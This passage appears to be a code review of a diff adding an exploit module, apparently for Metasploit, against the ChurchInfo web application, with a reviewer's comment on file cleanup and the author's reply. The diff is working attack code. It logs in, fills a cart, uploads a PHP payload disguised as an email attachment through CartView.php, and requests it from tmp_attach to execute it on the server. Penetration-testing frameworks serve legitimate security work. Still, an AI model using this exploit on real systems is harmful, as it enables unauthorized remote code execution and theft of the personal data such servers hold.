modules/exploits/multi/http/churchinfo_upload_exec.rb

```diff
@@ -0,0 +1,183 @@
+    end
+    print_good("Logged into application as #{datastore['USERNAME']}")
+    vprint_status('Attempting exploit')
+
+    # We must establish items in the cart before we can sent the emails. This is a hard requirement server-side.
+    print_status('Navigating to add items to cart')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, datastore['APPBASE'], 'SelectList.php'),
+      'method' => 'GET',
+      'vars_get' => {
+        'Sort' => 'name',
+        'Filter' => '',
+        'mode' => 'person',
+        'Letter' => '',
+        'Gender' => '',
+        'Classification' => '',
+        'FamilyRole' => '',
+        'PersonProperties' => '',
+        'grouptype' => '',
+        'AddAllToCart' => 'Add+to+Cart'
+      },
+      'cookie' => cookie
+    )
+
+    # Need to check that items were successfully added to the cart
+    # Here we're looking through html for the version string, similar to:
+    # Items in Cart: 2
+    /Items in Cart: (?<cart>\d)/ =~ res.body
+    if cart.to_i < 1
+      print_error("Items in Cart: #{cart}")
+      fail_with(Failure::UnexpectedReply,
+                "Failure to add items to cart, #{cart} items were detected. Check if there are person entries in the application")
+    end
+    print_good("Items in Cart: #{cart}")
+
+    # Uploading exploit as temporary email attachment
+    print_good('Uploading exploit via Email temp email attachment')
+    payload_name = rand_text_alpha(rand(5..14)) + '.php'
+    vprint_status("Payload name is #{payload_name}")
+
+    # Create the POST payload with required parameters to be parsed by the server
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(payload.encoded, 'application/octet-stream', nil,
+                       "form-data; name=\"Attach\"; filename=\"#{payload_name}\"")
+    vprint_status('Payload added to post_data')
+    post_data.add_part(datastore['EMAIL_SUBJ'], '', nil, 'form-data; name="emailsubject"')
+    vprint_status('Subject added to post_data')
+    post_data.add_part(datastore['EMAIL_MESG'], '', nil, 'form-data; name="emailmessage"')
+    vprint_status('emailmessage added to post_data')
+    post_data.add_part('Save Email', '', nil, 'form-data; name="submit"')
+    vprint_status('submit added to post_data')
+    file = post_data.to_s
+    file.strip!
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, datastore['APPBASE'] + 'CartView.php'),
+      'method' => 'POST',
+      'data' => file,
+      'cookie' => cookie,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
+    )
+
+    # Perform GET to PHP code uploaded as attachment and be interpreted by the server
+    exploit_uri = normalize_uri(target_uri.path, datastore['APPBASE'], 'tmp_attach', payload_name)
+    print_good("Exploit uploaded to #{exploit_uri}")
+    print_warning("Don't forget to clean up artifacts at #{exploit_uri}")
```

Comment:
You probably mean to register those files for cleanup. If you can't register them to be cleaned up automatically, then you can remove the `FileDropper` mixin and the meterpreter compatibility command in the module info.

Reply:
Added the `register_file_for_cleanup` to the exploit in most recent commit, I was unaware this was a usable function which is really neat. Thanks!